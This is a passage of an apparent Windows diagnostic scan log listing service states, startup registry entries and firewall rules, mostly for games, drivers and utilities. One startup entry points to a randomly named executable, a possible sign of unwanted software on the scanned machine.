MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
